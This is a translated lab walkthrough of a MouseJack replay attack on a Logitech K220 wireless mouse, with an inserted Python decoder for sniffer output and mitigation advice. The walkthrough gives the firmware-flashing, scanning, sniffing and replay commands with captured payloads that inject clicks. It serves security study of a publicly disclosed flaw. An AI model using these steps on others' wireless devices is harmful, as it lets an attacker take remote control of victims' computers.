
Replay-Attack Experiment: Taking Control of a Logitech Wireless Mouse with Crazyradio

0x001 Overview


A wireless mouse generally consists of two parts: the mouse itself and its receiver. The mouse collects its operating state (the pressed/released state of each button, the movement trajectory, and so on), modulates that data onto a radio signal at a specific frequency (for example 24 MHz, 27 MHz, 2.4 GHz, or Bluetooth) and transmits it. The receiver demodulates the signal back into data, parses it and performs the corresponding action, such as a button click or a cursor movement. In most cases a wireless mouse talks to the PC at 2.4 GHz. With a Crazyradio and the MouseJack project it is easy to sniff the band a 2.4 GHz wireless device operates in, analyse the transmitted frames and then carry out a replay attack.


Environment: Kali Linux 2018.2 amd64


Hardware: 1. one Crazyradio PA transceiver (available on Taobao); 2. one Logitech K220 keyboard and mouse set


0x002 Flashing the firmware


Plug in the Crazyradio. A freshly purchased unit shows the USB ID 1915:7777:

lsusb


Install the dependencies:

sudo apt install sdcc binutils python python-pip
pip install pyusb
pip install platformio

Flash the Crazyradio PA firmware. First put the device into its bootloader:

git clone https://github.com/bitcraze/crazyradio-firmware
cd crazyradio-firmware
python usbtools/launchBootloader.py    # sometimes this errors out; just retry a few times

If the script prints output like this, the bootloader has started successfully.



Flash the firmware:

wget https://github.com/bitcraze/crazyradio-firmware/releases/download/0.53/cradio-pa-0.53.bin
python usbtools/nrfbootload.py flash cradio-pa-0.53.bin

Once flashing has succeeded, unplug and re-plug the device.


The USB ID is now 1915:0101.



0x003 Building the MouseJack project


MouseJack is a hijacking attack aimed specifically at wireless keyboards and mice. In 2016 Bastille, a US IoT security start-up, published a vulnerability disclosure report on wireless mice, stating that wireless mice and keyboards from several vendors had security flaws that let an attacker with a low-cost radio remotely control a victim's wireless mouse from as far as 100 metres away and perform malicious actions.

Build and flash it:

git clone --recursive https://github.com/RFStorm/mousejack.git
cd mousejack
make
make install

Flashing succeeded.



Unplug and re-plug the device; the USB ID is now 1915:0102.



0x004 Sniffing and replay attack


Scan for nearby wireless devices:

cd ./nrf-research-firmware/tools
./nrf24-scanner.py
[2018-07-04 20:33:04.913]  74  10  62:10:91:08:A4  00:C2:00:00:FF:6F:00:00:00:D0
[2018-07-04 20:33:04.926]  74  10  62:10:91:08:A4  00:C2:00:00:00:10:00:00:00:2E
[2018-07-04 20:33:04.934]  74  10  62:10:91:08:A4  00:C2:00:00:00:20:00:00:00:1E
[2018-07-04 20:33:04.960]  74  10  62:10:91:08:A4  00:C2:00:00:00:20:00:00:00:1E
[2018-07-04 20:33:07.318]  14  10  62:10:91:08:A4  00:C2:00:00:FC:3F:00:00:00:03
[2018-07-04 20:33:15.953]  14   0  62:10:91:08:A4  
[2018-07-04 20:33:17.732]  31  10  62:10:91:08:A4  00:C2:00:00:F1:DF:FE:00:00:70
[2018-07-04 20:33:21.906]  70   0  62:10:91:08:A4  
[2018-07-04 20:33:22.301]  74   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:33:32.628]   8   0  62:10:91:08:A4  
[2018-07-04 20:33:32.711]   8   0  62:10:91:08:A4  
[2018-07-04 20:33:42.244]  17  10  62:10:91:08:A4  00:C2:00:00:FF:0F:00:00:00:30
[2018-07-04 20:33:42.256]  17   0  62:10:91:08:A4  
[2018-07-04 20:33:42.299]  17  10  62:10:91:08:A4  00:C2:00:00:FE:0F:00:00:00:31
[2018-07-04 20:33:50.347]  11  10  62:10:91:08:A4  00:C2:00:00:0D:20:FF:00:00:12
[2018-07-04 20:33:50.974]  17  10  62:10:91:08:A4  00:C2:00:00:DA:0F:00:00:00:55
[2018-07-04 20:34:07.962]  14  10  62:10:91:08:A4  00:C2:00:00:01:E0:FF:00:00:5E
[2018-07-04 20:34:07.970]  14  10  62:10:91:08:A4  00:C2:00:00:02:E0:FF:00:00:5D
[2018-07-04 20:34:07.998]  14  10  62:10:91:08:A4  00:C2:00:00:01:D0:FF:00:00:6E
[2018-07-04 20:34:08.247]  17  10  62:10:91:08:A4  00:C2:00:00:02:E0:FF:00:00:5D
[2018-07-04 20:34:15.651]   5  10  6B:AD:EE:72:B4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:34:16.054]   8   0  6B:AD:EE:72:B4  
[2018-07-04 20:34:35.945]  32   0  62:10:91:08:A4  
[2018-07-04 20:34:36.244]  35  10  62:10:91:08:A4  00:C2:00:00:04:10:00:00:00:2A

By operating the wireless device while the scanner runs, its address (the 5-byte nRF24 address printed before the payload, which the article refers to as the MAC address) is revealed.


I have a vulnerable Logitech K220 keyboard and mouse set here, and the mouse's address is confirmed to be 62:10:91:08:A4.


Now sniff that mouse specifically. Note that every time the script is re-run, the device has to be unplugged and re-plugged.

./nrf24-sniffer.py -a 62:10:91:08:A4
[2018-07-04 20:43:44.083]   5  10  62:10:91:08:A4  00:C2:00:00:03:F0:FF:00:00:4C
[2018-07-04 20:43:44.090]   5  10  62:10:91:08:A4  00:C2:00:00:05:D0:FF:00:00:6A
[2018-07-04 20:43:44.098]   5  10  62:10:91:08:A4  00:C2:00:00:02:00:00:00:00:3C
[2018-07-04 20:43:44.105]   5  10  62:10:91:08:A4  00:C2:00:00:03:F0:FF:00:00:4C
[2018-07-04 20:43:44.113]   5  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:43:44.191]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.195]   5  10  62:10:91:08:A4  00:C2:00:00:FF:2F:00:00:00:10
[2018-07-04 20:43:44.205]   5  10  62:10:91:08:A4  00:C2:00:00:FA:3F:00:00:00:05
[2018-07-04 20:43:44.209]   5  10  62:10:91:08:A4  00:C2:00:00:FA:6F:00:00:00:D5
[2018-07-04 20:43:44.223]   5  10  62:10:91:08:A4  00:C2:00:00:FB:5F:00:00:00:E4
[2018-07-04 20:43:44.226]   5  10  62:10:91:08:A4  00:C2:00:00:FA:6F:00:00:00:D5
[2018-07-04 20:43:44.234]   5  10  62:10:91:08:A4  00:C2:00:00:F9:5F:00:00:00:E6
[2018-07-04 20:43:44.245]   5  10  62:10:91:08:A4  00:C2:00:00:FB:8F:00:00:00:B4
[2018-07-04 20:43:44.258]   5  10  62:10:91:08:A4  00:C2:00:00:F8:7F:00:00:00:C7
[2018-07-04 20:43:44.261]   5  10  62:10:91:08:A4  00:C2:00:00:F9:6F:00:00:00:D6
[2018-07-04 20:43:44.268]   5  10  62:10:91:08:A4  00:C2:00:00:F7:5F:00:00:00:E8
[2018-07-04 20:43:44.279]   5  10  62:10:91:08:A4  00:C2:00:00:F8:6F:00:00:00:D7
[2018-07-04 20:43:44.287]   5  10  62:10:91:08:A4  00:C2:00:00:FB:3F:00:00:00:04
[2018-07-04 20:43:44.295]   5  10  62:10:91:08:A4  00:C2:00:00:F9:5F:00:00:00:E6
[2018-07-04 20:43:44.303]   5  10  62:10:91:08:A4  00:C2:00:00:FB:2F:00:00:00:14
[2018-07-04 20:43:44.310]   5  10  62:10:91:08:A4  00:C2:00:00:FF:1F:00:00:00:20
[2018-07-04 20:43:44.318]   5  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 20:43:44.397]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.474]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.551]   5   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 20:43:44.631]   5   5  62:10:91:08:A4  00:40:00:55:6B

Moving or clicking the mouse produces a large amount of sniffed data.


Click the right mouse button while sniffing continuously:

# channels observed during sniffing
4 5 7 13 16 17 31 40 43 65 73

# right button pressed
[2018-07-04 23:22:22.865]   4  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 23:22:22.873]   4  10  62:10:91:08:A4  00:C2:02:00:00:00:00:00:00:3C
[2018-07-04 23:22:22.882]   4  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C

# right button released
[2018-07-04 23:23:16.102]  13  10  62:10:91:08:A4  00:C2:00:00:00:00:00:00:00:3E
[2018-07-04 23:23:16.109]  13  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C
[2018-07-04 23:23:16.185]  13   5  62:10:91:08:A4  00:40:00:55:6B
[2018-07-04 23:23:16.263]  13  10  62:10:91:08:A4  00:4F:00:03:70:00:00:00:00:3E
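To make sense of captures like the ones above without reading hex by hand, here is a small decoder for nrf24-scanner/nrf24-sniffer output lines. It is an added example written for this article and is not code from the original post or from the MouseJack project. It parses each line into timestamp, channel, length, address and payload, verifies the trailing checksum byte, names the frame type, decodes button and movement fields of mouse reports, and builds a per-address inventory. That inventory is what a defender wants when auditing which unencrypted 2.4 GHz HID transmitters are present in an office; the decoder also makes the root cause visible: the frames carry no sequence number or authentication tag, only an additive checksum, which is exactly why a recorded frame can be replayed. The frame-type byte values, the checksum rule (all bytes sum to 0 mod 256) and the packed 12-bit X/Y layout are assumptions taken from the public MouseJack research; the page itself confirms only the 0x40, 0x4F and 0xC2 types and the right-button byte 0x02. The sample lines are copied from the captures on this page.

```python
"""Decoder for nrf24-scanner / nrf24-sniffer capture lines (added example).

Column layout of the tool output as it appears on the page:
    [timestamp]  channel  payload_length  address  payload_bytes
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<chan>\d+)\s+(?P<length>\d+)\s+"
    r"(?P<addr>(?:[0-9A-F]{2}:){4}[0-9A-F]{2})\s*(?P<payload>(?:[0-9A-F]{2}:?)*)\s*$"
)

# Assumed meaning of the report-type byte (payload[1]), from the MouseJack research.
FRAME_TYPES = {0x40: "keepalive", 0x4F: "set-keepalive-timeout", 0xC2: "mouse"}
# Button bit-mask in payload[2]; 0x02 == right button is confirmed by the capture above.
BUTTON_BITS = {0x01: "left", 0x02: "right", 0x04: "middle"}

# Constructed sample: lines copied from the captures on this page.
SAMPLE_LINES = [
    "[2018-07-04 20:33:04.913]  74  10  62:10:91:08:A4  00:C2:00:00:FF:6F:00:00:00:D0",
    "[2018-07-04 20:33:15.953]  14   0  62:10:91:08:A4  ",
    "[2018-07-04 20:33:22.301]  74   5  62:10:91:08:A4  00:40:00:55:6B",
    "[2018-07-04 23:22:22.865]   4  10  62:10:91:08:A4  00:4F:00:00:55:00:00:00:00:5C",
    "[2018-07-04 23:22:22.873]   4  10  62:10:91:08:A4  00:C2:02:00:00:00:00:00:00:3C",
    "[2018-07-04 20:34:15.651]   5  10  6B:AD:EE:72:B4  00:4F:00:00:55:00:00:00:00:5C",
]


def parse_line(line):
    """Split one tool output line into its fields; return None for non-matching lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m["payload"].replace(":", "")
    return {"ts": m["ts"], "channel": int(m["chan"]), "length": int(m["length"]),
            "addr": m["addr"], "payload": bytes.fromhex(raw) if raw else b""}


def checksum_ok(payload):
    """Assumed rule: the last byte is chosen so that all bytes sum to 0 mod 256.
    Every payload captured on the page satisfies it."""
    return len(payload) >= 2 and sum(payload) % 256 == 0


def _signed12(v):
    return v - 0x1000 if v & 0x800 else v


def decode_mouse(payload):
    """Assumed layout of a 10-byte 0xC2 report: buttons in byte 2, X and Y as
    packed signed 12-bit values in bytes 4..6 (X low byte, shared nibble byte, Y high byte)."""
    buttons = [name for bit, name in BUTTON_BITS.items() if payload[2] & bit]
    dx = _signed12(payload[4] | ((payload[5] & 0x0F) << 8))
    dy = _signed12((payload[5] >> 4) | (payload[6] << 4))
    return {"buttons": buttons, "dx": dx, "dy": dy}


def classify(rec):
    """Name the frame and decode it where the layout is known."""
    p = rec["payload"]
    if not p:
        return {"kind": "ack/empty"}          # zero-length rows are ACK/empty frames
    if not checksum_ok(p):
        return {"kind": "corrupt"}            # bad checksum: RF noise, discard
    kind = FRAME_TYPES.get(p[1], "unknown-0x%02X" % p[1])
    info = {"kind": kind}
    if kind == "mouse" and len(p) == 10:
        info.update(decode_mouse(p))
    return info


def summarize(lines):
    """Per-address inventory: channels used, frame counts by kind, button presses."""
    inv = defaultdict(lambda: {"channels": set(), "kinds": Counter(), "presses": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        info = classify(rec)
        entry = inv[rec["addr"]]
        entry["channels"].add(rec["channel"])
        entry["kinds"][info["kind"]] += 1
        if info.get("buttons"):
            entry["presses"].append((rec["ts"], info["buttons"]))
    return {addr: {"channels": sorted(e["channels"]), "kinds": dict(e["kinds"]),
                   "presses": list(e["presses"])} for addr, e in inv.items()}


if __name__ == "__main__":
    for addr, entry in summarize(SAMPLE_LINES).items():
        print(addr, entry)
```

Pipe a saved capture into summarize() (one line per list element) to list every transmitter the radio heard, the channels it hopped across and which button events were captured. Because the only integrity field is the additive checksum, the decoder cannot tell a live frame from a replayed copy; that is the property the vendor firmware updates released after the MouseJack disclosure were meant to address, so checking receiver firmware versions is the practical mitigation for an affected device.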

Replay the captured frames to confirm the hypothesis:

python replay.py -c 4 5 7 13 16 17 31 40 43 65 73 -a 62:10:91:08:A4 -d 00:4F:00:00:55:00:00:00:00:5C 00:C2:02:00:00:00:00:00:00:3C 00:4F:00:00:55:00:00:00:00:5C
Trying address 62:10:91:08:A4 on channel 13
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 40
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 4
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 4
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 16
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C
Trying address 62:10:91:08:A4 on channel 43
Tring send payload 00:4F:00:00:55:00:00:00:00:5C
Tring send payload 00:C2:02:00:00:00:00:00:00:3C

A right-click occurred on the target machine, so the replay succeeded.



Original author: janw3n. This article is part of the FreeBuf original-content reward programme; reproduction without permission is prohibited.

